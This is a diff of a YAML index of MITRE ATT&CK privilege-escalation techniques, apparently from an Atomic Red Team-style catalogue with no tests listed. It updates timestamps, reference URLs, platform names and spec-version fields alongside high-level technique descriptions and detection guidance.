         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -17256,13 +17591,11 @@ privilege-escalation:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17323,9 +17656,9 @@ privilege-escalation:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -17334,7 +17667,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -17387,7 +17719,7 @@ privilege-escalation:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17408,12 +17740,11 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -17516,7 +17847,6 @@ privilege-escalation:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1611:
@@ -17616,12 +17946,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1611
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17634,7 +17963,6 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -17647,7 +17975,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -17677,7 +18004,8 @@ privilege-escalation:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1547.005:
@@ -17704,7 +18032,7 @@ privilege-escalation:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17730,13 +18058,11 @@ privilege-escalation:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -17813,12 +18139,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -17837,6 +18162,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -17844,7 +18170,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -17864,34 +18189,36 @@ privilege-escalation:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -17927,6 +18254,10 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -17938,16 +18269,12 @@ privilege-escalation:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -17983,12 +18310,12 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -17996,14 +18323,13 @@ privilege-escalation:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -18018,6 +18344,7 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -18026,18 +18353,18 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -18069,9 +18396,6 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -18143,7 +18467,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -18170,7 +18493,7 @@ privilege-escalation:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -18196,13 +18519,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -18323,12 +18644,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -18360,11 +18680,10 @@ privilege-escalation:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -18405,11 +18724,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -18465,12 +18783,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18527,7 +18844,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1547.004:
@@ -18597,7 +18913,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -18707,7 +19022,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -18761,7 +19075,7 @@ privilege-escalation:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -18794,13 +19108,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -18862,10 +19174,9 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -18923,7 +19234,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -18965,7 +19275,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -19024,8 +19334,6 @@ privilege-escalation:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.005:
     technique:
@@ -19055,7 +19363,7 @@ privilege-escalation:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -19090,12 +19398,10 @@ privilege-escalation:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19172,7 +19478,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1055.004:
@@ -19211,7 +19516,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -19260,8 +19565,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1546.009:
@@ -19293,7 +19596,7 @@ privilege-escalation:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19341,13 +19644,11 @@ privilege-escalation:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19360,16 +19661,16 @@ privilege-escalation:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -19381,16 +19682,16 @@ privilege-escalation:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -19445,7 +19746,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.002:
     technique:
@@ -19468,7 +19768,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19512,8 +19812,6 @@ privilege-escalation:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1547.015:
@@ -19590,7 +19888,7 @@ privilege-escalation:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -19618,8 +19916,6 @@ privilege-escalation:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1134.001:
@@ -19678,23 +19974,22 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
